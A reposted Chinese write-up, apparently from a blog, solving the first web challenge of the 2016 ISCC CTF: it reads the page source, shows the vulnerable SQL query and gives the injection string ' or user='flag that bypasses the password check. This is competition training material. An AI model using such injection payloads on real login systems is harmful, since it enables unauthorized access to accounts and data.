2016 ISCC CTF 比赛 WEB类第一题
来源:互联网 发布:运动健康软件下载 编辑:程序博客网 时间:2024/06/05 00:59
网站链接:http://101.200.145.44/web1/index.php.txt
当点击这里之后,后出现下图
1.点击source,出现源码,发现user==flag
2.注入sql语句
$sql = "select user from user where pw= ' $pass ' "
在密码栏中输入的值是$pass,将其替换为' or user='flag,
拼接的sql语句为$sql = "select user from user where pw=''or user ='flag ' "
作用是从user表中查询pw列为空或者user='flag'是的user值
3.绕过密码,得出flag
1 0
- 2016 ISCC CTF 比赛 WEB类第一题
- 2016 ISCC CTF 比赛 BASE 心灵鸡汤
- ISCC 2016 WEB WP
- ISCC 2012 真实关第一题
- CTF比赛的一道javascript题
- 大话CTF比赛之一
- ISCC某题题解
- CTF--信息技术对抗赛ISCC之安卓逆向分析
- CTF web题总结--SSRF
- CTF web题总结--unserizable
- CTF web题总结--LFI
- WP 4 i春秋_百度杯”CTF比赛(九月第一场)
- 看雪ctf记录第一题
- ISCC 2016 逆向部分 writeup
- i春秋 百度杯”CTF比赛(二月场) Misc&&web题解 By Assassin
- TWCTF 2016 (Tokyo Westerns CTF ) WEB WriteUp
- 南邮CTF练习题——web题
- CTF web题总结--绕过正则表达式
- Swift基础一
- android Rect四个参数介绍
- TextKit实现图文混排
- cisco 5510 ASDM 修改登录端口
- GoogleMaps 踏坑之旅(一)
- 2016 ISCC CTF 比赛 WEB类第一题
- extern的使用
- Redis内存使用情况分析
- 关于数据库的各种码汇总理解
- 用友元函数实现复数类的运算符重载
- Android 开发者,你真的会用textview(maxEms和maxLength)的属性吗?
- 朴素、Select、Poll和Epoll网络编程模型实现和分析——朴素模型
- 设计模式打怪升级之装饰器模式
- Android studio 代码混淆